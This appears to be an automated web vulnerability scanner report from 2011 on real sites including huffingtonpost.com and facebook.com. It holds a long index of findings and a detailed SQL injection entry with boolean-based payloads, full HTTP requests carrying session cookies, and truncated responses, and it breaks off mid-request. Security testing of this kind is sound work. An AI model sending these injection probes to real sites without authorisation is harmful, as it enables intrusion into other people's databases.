20.389. http://www.facebook.com/plugins/like.php

20.390. http://www.facebook.com/plugins/like.php

20.391. http://www.facebook.com/plugins/like.php

20.392. http://www.facebook.com/plugins/like.php

20.393. http://www.facebook.com/plugins/like.php

20.394. http://www.facebook.com/plugins/like.php

20.395. http://www.facebook.com/plugins/like.php

20.396. http://www.facebook.com/plugins/like.php

20.397. http://www.facebook.com/plugins/like.php

20.398. http://www.facebook.com/plugins/like.php

20.399. http://www.facebook.com/plugins/like.php

20.400. http://www.facebook.com/plugins/like.php

20.401. http://www.facebook.com/plugins/like.php

20.402. http://www.facebook.com/plugins/like.php

20.403. http://www.facebook.com/plugins/like.php

20.404. http://www.facebook.com/plugins/like.php

20.405. http://www.facebook.com/plugins/like.php

20.406. http://www.facebook.com/plugins/like.php

20.407. http://www.facebook.com/plugins/like.php

20.408. http://www.facebook.com/plugins/like.php

20.409. http://www.facebook.com/plugins/like.php

20.410. http://www.facebook.com/plugins/like.php

20.411. http://www.facebook.com/plugins/like.php

20.412. http://www.facebook.com/plugins/like.php

20.413. http://www.facebook.com/plugins/like.php

20.414. http://www.facebook.com/plugins/like.php

20.415. http://www.facebook.com/plugins/like.php

20.416. http://www.facebook.com/plugins/like.php

20.417. http://www.facebook.com/plugins/like.php

20.418. http://www.facebook.com/plugins/like.php

20.419. http://www.facebook.com/plugins/like.php

20.420. http://www.facebook.com/plugins/like.php

20.421. http://www.facebook.com/plugins/like.php

20.422. http://www.facebook.com/plugins/like.php

20.423. http://www.facebook.com/plugins/like.php

20.424. http://www.facebook.com/plugins/like.php

20.425. http://www.facebook.com/plugins/likebox.php

20.426. http://www.facebook.com/plugins/likebox.php

20.427. http://www.facebook.com/plugins/likebox.php

20.428. http://www.facebook.com/plugins/likebox.php

20.429. http://www.facebook.com/plugins/likebox.php

20.430. http://www.facebook.com/plugins/likebox.php

20.431. http://www.facebook.com/plugins/likebox.php

20.432. http://www.facebook.com/plugins/likebox.php

20.433. http://www.facebook.com/plugins/likebox.php

20.434. http://www.facebook.com/plugins/likebox.php

20.435. http://www.facebook.com/plugins/likebox.php

20.436. http://www.facebook.com/plugins/likebox.php

20.437. http://www.facebook.com/plugins/likebox.php

20.438. http://www.facebook.com/plugins/likebox.php

20.439. http://www.facebook.com/plugins/likebox.php

20.440. http://www.facebook.com/plugins/likebox.php

20.441. http://www.facebook.com/plugins/likebox.php

20.442. http://www.facebook.com/plugins/likebox.php

20.443. http://www.facebook.com/plugins/likebox.php

20.444. http://www.facebook.com/plugins/likebox.php

20.445. http://www.facebook.com/plugins/likebox.php

20.446. http://www.facebook.com/plugins/likebox.php

20.447. http://www.facebook.com/plugins/likebox.php

20.448. http://www.facebook.com/plugins/likebox.php

20.449. http://www.facebook.com/plugins/likebox.php

20.450. http://www.facebook.com/plugins/likebox.php

20.451. http://www.facebook.com/plugins/likebox.php

20.452. http://www.facebook.com/plugins/likebox.php

20.453. http://www.facebook.com/plugins/likebox.php

20.454. http://www.facebook.com/plugins/likebox.php

20.455. http://www.facebook.com/plugins/likebox.php

20.456. http://www.facebook.com/plugins/likebox.php

20.457. http://www.facebook.com/plugins/likebox.php

20.458. http://www.facebook.com/plugins/likebox.php

20.459. http://www.facebook.com/plugins/likebox.php

20.460. http://www.facebook.com/plugins/likebox.php

20.461. http://www.facebook.com/plugins/likebox.php

20.462. http://www.facebook.com/plugins/likebox.php

20.463. http://www.facebook.com/plugins/likebox.php

20.464. http://www.facebook.com/plugins/likebox.php

20.465. http://www.facebook.com/plugins/likebox.php

20.466. http://www.facebook.com/plugins/likebox.php

20.467. http://www.facebook.com/plugins/likebox.php

20.468. http://www.facebook.com/plugins/likebox.php

20.469. http://www.facebook.com/plugins/likebox.php

20.470. http://www.facebook.com/plugins/likebox.php

20.471. http://www.facebook.com/plugins/likebox.php

20.472. http://www.facebook.com/plugins/likebox.php

20.473. http://www.facebook.com/plugins/likebox.php

20.474. http://www.facebook.com/plugins/likebox.php

20.475. http://www.facebook.com/plugins/likebox.php

20.476. http://www.facebook.com/plugins/likebox.php

20.477. http://www.facebook.com/plugins/likebox.php

20.478. http://www.facebook.com/plugins/likebox.php

20.479. http://www.facebook.com/plugins/likebox.php

20.480. http://www.facebook.com/plugins/likebox.php

20.481. http://www.facebook.com/plugins/likebox.php

20.482. http://www.facebook.com/plugins/likebox.php

20.483. http://www.facebook.com/plugins/likebox.php

20.484. http://www.facebook.com/plugins/likebox.php

20.485. http://www.facebook.com/plugins/likebox.php

20.486. http://www.facebook.com/plugins/likebox.php

20.487. http://www.facebook.com/plugins/likebox.php

20.488. http://www.facebook.com/plugins/likebox.php

20.489. http://www.facebook.com/plugins/likebox.php

20.490. http://www.facebook.com/plugins/likebox.php

20.491. http://www.facebook.com/plugins/likebox.php

20.492. http://www.facebook.com/plugins/likebox.php

20.493. http://www.facebook.com/plugins/likebox.php

20.494. http://www.facebook.com/plugins/likebox.php

20.495. http://www.facebook.com/plugins/likebox.php

20.496. http://www.facebook.com/plugins/likebox.php

20.497. http://www.facebook.com/plugins/likebox.php

20.498. http://www.facebook.com/plugins/likebox.php

20.499. http://www.facebook.com/plugins/likebox.php

20.500. http://www.facebook.com/plugins/likebox.php

20.501. http://www.facebook.com/plugins/likebox.php

20.502. http://www.facebook.com/plugins/likebox.php

20.503. http://www.facebook.com/plugins/likebox.php

20.504. http://www.facebook.com/plugins/likebox.php

20.505. http://www.facebook.com/plugins/likebox.php

20.506. http://www.facebook.com/plugins/likebox.php

20.507. http://www.facebook.com/plugins/recommendations.php

20.508. http://www.facebook.com/plugins/recommendations.php

20.509. http://www.facebook.com/plugins/recommendations.php

20.510. http://www.facebook.com/plugins/recommendations.php

20.511. http://www.facebook.com/plugins/recommendations.php

20.512. http://www.facebook.com/plugins/recommendations.php

20.513. http://www.facebook.com/plugins/recommendations.php

20.514. http://www.facebook.com/plugins/recommendations.php

20.515. http://www.facebook.com/plugins/send.php

20.516. http://www.facebook.com/plugins/send.php

20.517. http://www.facebook.com/plugins/send.php

20.518. http://www.facebook.com/plugins/send.php

20.519. http://www.facebook.com/plugins/send.php

20.520. http://www.facebook.com/plugins/send.php

20.521. http://www.facebook.com/plugins/send.php

20.522. http://www.facebook.com/plugins/send.php

20.523. http://www.facebook.com/plugins/send.php

20.524. http://www.facebook.com/plugins/send.php

20.525. http://www.facebook.com/plugins/send.php

20.526. http://www.facebook.com/plugins/send.php

20.527. http://www.facebook.com/plugins/send.php

20.528. http://www.facebook.com/plugins/send.php

20.529. http://www.facebook.com/plugins/send.php

20.530. http://www.facebook.com/plugins/send.php

20.531. http://www.facebook.com/plugins/send.php

20.532. http://www.facebook.com/plugins/send.php

20.533. http://www.facebook.com/plugins/send.php

20.534. http://www.facebook.com/plugins/send.php

20.535. http://www.facebook.com/plugins/send.php

20.536. http://www.facebook.com/plugins/send.php

20.537. http://www.facebook.com/plugins/send.php

20.538. http://www.facebook.com/plugins/send.php

20.539. http://www.facebook.com/plugins/send.php

20.540. http://www.facebook.com/plugins/send.php

20.541. http://www.facebook.com/plugins/send.php

20.542. http://www.facebook.com/plugins/send.php

20.543. http://www.facebook.com/plugins/send.php

20.544. http://www.facebook.com/plugins/send.php

20.545. http://www.facebook.com/plugins/send.php

20.546. http://www.facebook.com/plugins/send.php

20.547. http://www.facebook.com/plugins/send.php

20.548. http://www.facebook.com/plugins/send.php

20.549. http://www.facebook.com/plugins/send.php

20.550. http://www.facebook.com/plugins/send.php

20.551. http://www.facebook.com/plugins/send.php

20.552. http://www.facebook.com/plugins/send.php

20.553. http://www.facebook.com/plugins/send.php

20.554. http://www.facebook.com/plugins/send.php

20.555. http://www.facebook.com/plugins/send.php

20.556. http://www.facebook.com/plugins/send.php

20.557. http://www.facebook.com/plugins/send.php

20.558. http://www.facebook.com/plugins/send.php

20.559. http://www.facebook.com/plugins/send.php

20.560. http://www.facebook.com/plugins/send.php

20.561. http://www.facebook.com/plugins/send.php

20.562. http://www.facebook.com/plugins/send.php

20.563. http://www.facebook.com/plugins/send.php

20.564. http://www.facebook.com/plugins/send.php

20.565. http://www.facebook.com/plugins/send.php

20.566. http://www.facebook.com/plugins/send.php

20.567. http://www.facebook.com/plugins/send.php

20.568. http://www.facebook.com/plugins/send.php

20.569. http://www.facebook.com/plugins/send.php

20.570. http://www.facebook.com/plugins/send.php

20.571. http://www.facebook.com/plugins/send.php

20.572. http://www.facebook.com/plugins/send.php

20.573. http://www.facebook.com/plugins/send.php

20.574. http://www.facebook.com/plugins/send.php

20.575. http://www.facebook.com/plugins/send.php

20.576. http://www.facebook.com/plugins/send.php

20.577. http://www.facebook.com/plugins/send.php

20.578. http://www.facebook.com/plugins/send.php

20.579. http://www.facebook.com/plugins/send.php

20.580. http://www.facebook.com/plugins/send.php

20.581. http://www.facebook.com/plugins/send.php

20.582. http://www.facebook.com/plugins/send.php

20.583. http://www.facebook.com/plugins/send.php

20.584. http://www.facebook.com/plugins/send.php

20.585. http://www.facebook.com/plugins/send.php

20.586. http://www.facebook.com/plugins/send.php

20.587. http://www.facebook.com/plugins/send.php

20.588. http://www.facebook.com/plugins/send.php

20.589. http://www.facebook.com/plugins/send.php

20.590. http://www.facebook.com/plugins/send.php

20.591. http://www.facebook.com/plugins/send.php

20.592. http://www.facebook.com/plugins/send.php

20.593. http://www.facebook.com/plugins/send.php

20.594. http://www.facebook.com/plugins/send.php

20.595. http://www.facebook.com/plugins/send.php

20.596. http://www.facebook.com/plugins/send.php

20.597. http://www.facebook.com/plugins/send.php

20.598. http://www.facebook.com/plugins/send.php

20.599. http://www.facebook.com/plugins/send.php

20.600. http://www.facebook.com/plugins/send.php

20.601. http://www.facebook.com/plugins/send.php

20.602. http://www.facebook.com/policy.php

20.603. http://www.facebook.com/privacy/explanation.php

20.604. http://www.facebook.com/profile.php

20.605. http://www.facebook.com/profile.php

20.606. http://www.facebook.com/profile.php

20.607. http://www.facebook.com/r.php

20.608. http://www.facebook.com/r.php

20.609. http://www.facebook.com/r.php

20.610. http://www.facebook.com/r.php

20.611. http://www.facebook.com/r.php

20.612. http://www.facebook.com/recover.php

20.613. http://www.facebook.com/recover.php

20.614. http://www.facebook.com/recover.php

20.615. http://www.facebook.com/robynalys

20.616. http://www.facebook.com/share.php

20.617. http://www.facebook.com/share.php

20.618. http://www.facebook.com/share.php

20.619. http://www.facebook.com/sharer.php

20.620. http://www.facebook.com/sharer.php

20.621. http://www.facebook.com/sharer.php

20.622. http://www.facebook.com/sharer.php

20.623. http://www.facebook.com/skdarealist

20.624. http://www.facebook.com/sportingnews

20.625. http://www.facebook.com/stefanoboscolomarchi

20.626. http://www.facebook.com/techcrunch

20.627. http://www.facebook.com/terms.php

20.628. http://www.facebook.com/terms.php

20.629. http://www.facebook.com/terms.php

20.630. http://www.facebook.com/terms.php

20.631. http://www.facebook.com/theteebers

20.632. http://www.facebook.com/wmoppert

20.633. https://www.facebook.com/

20.634. https://www.facebook.com/

20.635. https://www.facebook.com/ajax/intl/language_dialog.php

20.636. https://www.facebook.com/ajax/intl/language_dialog.php

20.637. https://www.facebook.com/ajax/intl/language_dialog.php

20.638. https://www.facebook.com/captcha/tfbimage.php

20.639. https://www.facebook.com/favicon.ico

20.640. https://www.facebook.com/favicon.ico

20.641. https://www.facebook.com/h02332

20.642. https://www.facebook.com/h02332

20.643. https://www.facebook.com/h02332

20.644. https://www.facebook.com/help/contact.php

20.645. https://www.facebook.com/login.php

20.646. https://www.facebook.com/login.php

20.647. https://www.facebook.com/login.php

20.648. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

20.649. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

20.650. https://www.facebook.com/pages/create.php

20.651. https://www.facebook.com/pages/create.php

20.652. https://www.facebook.com/pages/create.php

20.653. https://www.facebook.com/r.php

20.654. https://www.facebook.com/r.php

20.655. https://www.facebook.com/r.php

20.656. https://www.facebook.com/recover.php

20.657. https://www.facebook.com/recover.php

20.658. http://www.google.com/sdch/rU20-FBA.dct

21. Credit card numbers disclosed

21.1. http://www.facebook.com/directory/pages/

21.2. http://www.facebook.com/directory/people/

22. Robots.txt file

22.1. http://www.aolnews.com/

22.2. http://www.apple.com/itunes/affiliates/download/

22.3. http://www.bankrate.com/funnel/mortgages/

22.4. http://www.blogger.com/blog-post-reactions.g

22.5. http://www.citysbest.com/

22.6. http://www.crunchboard.com/opening/detailjob.php

22.7. http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

22.8. http://www.dailyfinance.com/

22.9. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

22.10. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

22.11. http://www.facebook.com/extern/login_status.php

22.12. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

22.13. http://www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

22.14. http://www.fiddler2.com/fiddler2/updatecheck.asp

22.15. http://www.flickr.com/badge_code_v2.gne

22.16. http://www.ft.com/cms/s/0/18b96d66-76a2-11e0-bd5d-00144feabdc0.html

22.17. http://www.games.com/game/family-feud/

22.18. https://www.godaddy.com/

22.19. http://www.google-analytics.com/__utm.gif

22.20. http://www.google.com/aclk

22.21. http://www.googleadservices.com/pagead/conversion/1034849195/

22.22. http://www.huffingtonpost.com/

22.23. http://www.ibm.com/systems/info/x86servers/blades/networking/index.html

22.24. http://www.mapquest.com/

22.25. http://www.marketwatch.com/News/Story/Story.aspx

22.26. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

22.27. http://www.moviefone.com/

22.28. https://www.neodata.com/pub/snew/new_print.shtml

22.29. http://www.netvibes.com/subscribe.php

22.30. http://www.newsgator.com/ngs/subscriber/subext.aspx

22.31. http://www.popeater.com/

22.32. http://www.realtytrac.com/birdseyeimage/propertyimage.aspx

22.33. http://www.top-sec.com/vb/clientscript/ncode_imageresizer.js

22.34. http://www.truveo.com/search

22.35. http://www.tuaw.com/hub/app-reviews

22.36. http://xml.truveo.com/apiv3

22.37. http://yellowpages.aol.com/

23. Cacheable HTTPS response

23.1. https://www.facebook.com/ajax/intl/language_dialog.php

23.2. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

23.3. https://www.fightmagazine.com/mma-magazine/subscribe.asp

23.4. https://www.neodata.com/pub/snew/new_print.shtml

24. HTML does not specify charset

24.1. http://www.aol.com/ads/load_v7.html

24.2. http://www.dailyfinance.com/_uac/adpage.html

24.3. http://www.huffingtonpost.com/ed-schultz/president-obama-and-ameri_b_856947.html

24.4. http://www.mapquest.com/cdn/_uac/adpage.htm

24.5. http://www.mmafighting.com/_uac/adpage.html

24.6. https://www.neodata.com/pub/snew/new_print.shtml

24.7. http://www.opselect.com/ad_feedback/survey.adp

25. Content type incorrectly stated

25.1. http://www.aol.com/ajax.jsp

25.2. http://www.blogsmithmedia.com/realestate.aol.com/blog/media/alec-foege.gif

25.3. http://www.facebook.com/extern/login_status.php

25.4. http://www.fiddler2.com/fiddler2/updatecheck.asp

25.5. http://www.google.com/buzz/api/button.js

25.6. http://www.huffingtonpost.com/ads/check_flights.php

25.7. http://www.huffingtonpost.com/badge/badges_json_v2.php

25.8. http://www.huffingtonpost.com/include/mod_times.php

25.9. http://www.mapquest.com/_svc/searchio

25.10. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

26. Content type is not specified



1. SQL injection
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.huffingtonpost.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?icid=navbar_huffpo_main5&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=47570434?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

Request 2

GET /?icid=navbar_huffpo_main5&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=29
Date: Thu, 05 May 2011 01:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
HPAds.ads_client_info() + ';load_mode=inline;page_type=homepage;pos=pushdown;dcopt=ist;u=970x418|homepage|pushdown|||' + HPAds.ads_u_value() + '||||' + HPAds.ads_inf_value() + ';sz=970x418;tile=1;ord=78811701?"></scr' + 'ipt>';
                       if(HuffCookies.getCookie('is_aol_user')=="1" && ad_code.match(/mid_article/gi))
                       {                            
                           var adSonarArray = {
                               'default':[1517286,2255770],
                               'entertainment':[1517280,2259767],
                               'politics':[1517131,2259768],
                               'business':[1517131,2259768],
                               'sports':[1517295,2259769],
                               'travel':[1517304,2259770]
                               }
                               document.write('<style type=\"text/css\">#ad_mid_article {float:left;width:300px;margin:10px 10px 10px 0} .mid_article_ad_label {display:none} #mid_article_deco {border:none;margin:0;padding:0}</style>');
                               if(adSonarArray[HPConfig.current_vertical_name]){
                                   HPAds.adSonar(adSonarArray[HPConfig.current_vertical_name][0],adSonarArray[HPConfig.current_vertical_name][1],300,250)
                               }
                               else{
                                   HPAds.adSonar(adSonarArray['default'][0],adSonarArray['default'][1],300,250)
                               }
                       }
    else if(!(HuffCookies.getCookie('is_aol_user')=="1" && (ad_code.match(/left_lower/gi) || ad_code.match(/pushdown/gi) || ad_code.match(/curtain/gi) )))
{
   document.write(supress_keyvalues(ks, ad_code));
}
var debugadcode = '';
document.write(debugadcode);
}
</script></div> <script type="text/javascript">
QV.place_quickread_ads = true;
</script>
   
<div class="main_big_news_ontop" id="topnav_big_news_module">


<div id="big_news_update">
<ul class="big_news_ontop">
<li ><a href="/big-news/#homepage" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');" class="title">BIG NEWS:</a></li>
<li><a href="/news/gingrich-2012" class="big_news_item first" onclick="HPTrack.trackPageview('/t/a/topnav_bignews/v2');">Gingrich 2012</a></li>
<li class='line'>|</li>
<li><a href="/news/elections-2012" class="big_news_item bn_v_politics" onclick="HPTrack.trackPageview('/t/a/top
...[SNIP]...

1.2. http://www.huffingtonpost.com/threeup.php [v parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.huffingtonpost.com
Path:   /threeup.php

Issue detail

The v parameter appears to be vulnerable to SQL injection attacks. The payloads 83591090'%20or%201%3d1--%20 and 83591090'%20or%201%3d2--%20 were each submitted in the v parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d1--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:30:40 GMT
Connection: close
Content-Length: 7160

       <div id="857693" class="grid third flush_top threeup_entries">
           <div id="entry_857693" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">LIBYA TARGETS AID SHIP</a></h5>
           </div>
       </div>        <div id="857719" class="grid third flush_top threeup_entries">
           <div id="entry_857719" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" class="threeup_titles block margin_0_20" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">GRAPHIC: Photos Show 3 Dead Men At Bin Laden Compound</a></h5>
           </div>
       </div>        <div id="857555" class="grid third flush_top threeup_entries">
           <div id="entry_857555" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/afghanistan-pakistan-bin-laden_n_857555.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg" border="0" width="260" height="75" alt="" />        </a></div>
               <h5><a href="http://www.huffingtonpost.com/2011/05/04/afghan
...[SNIP]...

Request 2

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=183591090'%20or%201%3d2--%20&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
